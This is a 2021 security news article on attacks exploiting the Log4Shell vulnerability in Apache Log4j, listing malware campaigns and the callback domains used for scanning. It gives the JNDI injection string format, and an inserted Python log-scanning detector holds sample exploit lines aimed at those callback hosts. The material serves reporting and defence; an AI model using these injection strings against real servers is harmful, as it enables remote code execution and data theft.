URL: https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
HACKERS START PUSHING MALWARE IN WORLDWIDE LOG4SHELL ATTACKS

By Lawrence Abrams
December 12, 2021, 06:07 PM

Source: Kevin Beaumont

Threat actors and researchers are scanning for and exploiting the Log4j
Log4Shell vulnerability to deploy malware or find vulnerable servers. In this
article, we have compiled the known payloads, scans, and attacks using the Log4j
vulnerability.

Early Friday morning, an exploit was publicly released for a critical zero-day
vulnerability dubbed 'Log4Shell' in Apache Log4j, the Java-based logging library
that web servers and applications use to write their logs.

To exploit this vulnerability, a threat actor can change their web browser's
user agent and visit a site or search for a string on a website using the format
${jndi:ldap://[attacker_URL]}. Doing so will cause the string to be appended to
the web server's access logs.

When Log4j processes these log entries and encounters the string, the bug forces
the server to make a callback, or request, to the URL listed in the JNDI string.
Threat actors can then use that URL to pass Base64-encoded commands or Java
classes to execute on the vulnerable device.

Furthermore, simply forcing this connection to a remote server is enough to
determine whether a server is vulnerable to Log4Shell.

While Apache quickly released Log4j 2.15.0 to resolve the vulnerability, threat
actors had already started to scan for and exploit vulnerable servers to
exfiltrate data, install malware, or take over the server.

As this software is used in thousands of enterprise applications and websites,
there is significant concern that it will lead to widespread attacks and malware
deployment.

Below we outline the known attacks currently exploiting the Log4j vulnerability.


LOG4SHELL USED TO INSTALL MALWARE

When an easily exploitable remote code execution vulnerability is disclosed,
malware distributors are usually the first to begin utilizing it.

Below we have compiled the known malware payloads exploiting Log4j from
BleepingComputer web server access logs, GreyNoise data, and reports from
researchers.


CRYPTOMINERS

As soon as the vulnerability was released, we saw threat actors exploiting the
Log4Shell vulnerability to execute shell scripts that download and install
various cryptominers, as shown below.

The threat actors behind the Kinsing backdoor and cryptomining botnet are
heavily abusing the Log4j vulnerability with Base64 encoded payloads that have
the vulnerable server download and execute shell scripts.

Kinsing Log4Shell exploit and decoded commands
Source: BleepingComputer

This shell script will remove competing malware from the vulnerable device and
then download and install the Kinsing malware, which will begin mining for
cryptocurrency.

Kinsing installer script
Source: BleepingComputer

Other Log4Shell exploits seen by BleepingComputer to be installing miners can be
seen in the image below.

Other malicious cryptominer installers


MIRAI AND MUHSTIK BOTNETS

Netlab 360 reports that the threat actors exploit the vulnerability to install
the Mirai and Muhstik malware on vulnerable devices.

These malware families recruit IoT devices and servers into their botnets and
use them to deploy cryptominers and perform large-scale DDoS attacks.

"This morning we got the first answers, our Anglerfish and Apacket honeypots
have caught 2 waves of attacks using the Log4j vulnerability to form botnets,
and a quick sample analysis showed that they were used to form Muhstik and Mirai
botnets respectively, both targeting Linux devices," explain Netlab 360
researchers.


COBALT STRIKE BEACONS

The Microsoft Threat Intelligence Center reported that the Log4j vulnerabilities
are also being exploited to drop Cobalt Strike beacons.

Cobalt Strike is a legitimate penetration testing toolkit where red teamers
deploy agents, or beacons, on "compromised" devices to perform remote network
surveillance or execute further commands.

However, threat actors commonly use cracked versions of Cobalt Strike as part of
network breaches and during ransomware attacks. 


SCANNING AND INFORMATION DISCLOSURE

In addition to using the Log4Shell exploits to install malware, threat actors
and security researchers are using the exploit to scan for vulnerable servers
and exfiltrate information from them.

As you can see below, researchers use the exploit to force vulnerable servers to
access URLs or perform DNS requests for callback domains. This allows the
researchers or threat actors to determine if the server is vulnerable and use it
for future attacks, research, or attempts to claim a bug bounty award.

Some researchers may be going a step too far by using the exploit to exfiltrate
environment variables that contain server data without permission, including the
host's name, the user name the Log4j service is running under, the operating
system name, and OS version number.

Researchers and threat actors scanning for vulnerable servers
Source: BleepingComputer

The most common domains or IP addresses used in the scanning and/or data
exfiltration campaigns are:

interactsh.com
burpcollaborator.net
dnslog.cn
bin${upper:a}ryedge.io
leakix.net
bingsearchlib.com
205.185.115.217:47324
bingsearchlib.com:39356
canarytokens.com
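The log-entry mechanism described earlier and the callback list above, as an added example that is not from the article: a small Python detector that scans web server access-log lines for `${jndi:...}` lookups, collapses the `${upper:x}`/`${lower:x}` obfuscation visible in the `bin${upper:a}ryedge.io` entry, and flags whether the callback host is on the article's list. The sample log lines and the `normalise`, `find_jndi_callback` and `scan_log` names are constructed for this example.

```python
import re
from typing import List, Optional, Tuple

# Callback hosts the article lists as most common in Log4Shell scanning and
# exfiltration campaigns (bin${upper:a}ryedge.io stored in normalised form).
KNOWN_CALLBACK_HOSTS = {
    "interactsh.com", "burpcollaborator.net", "dnslog.cn", "binaryedge.io",
    "leakix.net", "bingsearchlib.com", "canarytokens.com", "205.185.115.217",
}
# Innermost ${upper:x} / ${lower:x} lookup (body may not contain $ or braces),
# so nested lookups collapse one layer per pass of normalise().
_CASE_LOOKUP = re.compile(r"\$\{(upper|lower):([^${}]*)\}", re.IGNORECASE)
# A JNDI lookup with its scheme, callback host and optional port.
_JNDI = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE)

def _apply_case(m):
    return m.group(2).upper() if m.group(1).lower() == "upper" else m.group(2).lower()

def normalise(text: str) -> str:
    """Resolve case-transform lookups so an obfuscated hostname compares equal."""
    prev = None
    while prev != text:  # repeat until no lookup is left to collapse
        prev, text = text, _CASE_LOOKUP.sub(_apply_case, text)
    return text

def find_jndi_callback(line: str) -> Optional[dict]:
    """Describe the first JNDI lookup in an access-log line, or None if absent."""
    m = _JNDI.search(normalise(line))
    if not m:
        return None
    host = m.group("host").lower()
    return {"scheme": m.group("scheme").lower(), "host": host,
            "port": int(m.group("port")) if m.group("port") else None,
            "known": host in KNOWN_CALLBACK_HOSTS}  # on the article's list?

def scan_log(lines: List[str]) -> List[Tuple[int, dict]]:
    """Return (1-based line number, finding) for every line carrying a lookup."""
    findings = ((n, find_jndi_callback(line)) for n, line in enumerate(lines, 1))
    return [(n, f) for n, f in findings if f]

# Constructed access-log lines (Apache combined format), not real traffic.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [12/Dec/2021:18:07:01 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://interactsh.com/a}"',
    '203.0.113.8 - - [12/Dec/2021:18:07:02 +0000] '
    '"GET /?q=${jndi:ldap://bin${upper:a}ryedge.io/x} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.9 - - [12/Dec/2021:18:07:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://205.185.115.217:47324/a}"',
    '198.51.100.2 - - [12/Dec/2021:18:07:04 +0000] "GET /news/ HTTP/1.1" 200 9000 "-" '
    '"Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, finding in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {number}: {finding}")
```

A hit with `known` set to False still deserves attention: the host is just not one the article happened to list.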

Of particular interest is the bingsearchlib.com domain, which is being used
heavily as a callback for Log4j exploits. However, a security researcher told
BleepingComputer that while the domain was being used as an exploit callback,
bingsearchlib.com was not registered.

The security researcher said they registered the domain to prevent threat actors
from abusing it but are not logging requests.

Threat intelligence company GreyNoise shows that IP addresses using the
bingsearchlib.com callback also commonly use a Log4Shell callback of
205.185.115.217:47324.

Another domain we have seen heavily used in Log4j vulnerability scans is the
'psc4fuel.com' domain. After publishing this article, a cybersecurity company
contacted us to state it was theirs.

In attacks whose purpose is unknown, BleepingComputer has seen repeated requests
from a domain named psc4fuel.com attempting to exploit our website. This domain
appears very similar to the legitimate psc4fuel.com domain belonging to a
petroleum services company.

psc4fuel.com domain used in Log4j attacks
Source: BleepingComputer

After publishing this story, BleepingComputer was contacted by a cybersecurity
company that states that the domain belongs to them, that no Java classes are
being pushed by the URLs, and that they do not accept connections at the URL.

As for the similarities of the domain, they told us that the domain is not
intentionally impersonating the petroleum company.

While there has been no public research showing that ransomware gangs or other
threat actors utilize the Log4j exploit, the fact that Cobalt Strike beacons
have been deployed means these attacks are imminent.

Due to this, it is imperative that all users install the latest version of Log4j
or affected applications to resolve this vulnerability as soon as possible.

If you know of other malware campaigns exploiting the Log4j vulnerability,
please let us know via Signal at 646-961-3731, Twitter, or our contact form so
we can add the information to this article.

Update 12/12/21 9:50 PM EST: Added Cobalt Strike beacons detected by Microsoft.
Update 12/14/21 11:00 AM EST: Updated story with more information about the
psc4fuel.com domain.


LAWRENCE ABRAMS

Lawrence Abrams is the owner and Editor in Chief of BleepingComputer.com.
Lawrence's area of expertise includes Windows, malware removal, and computer
forensics. Lawrence Abrams is a co-author of the Winternals Defragmentation,
Recovery, and Administration Field Guide and the technical editor for Rootkits
for Dummies.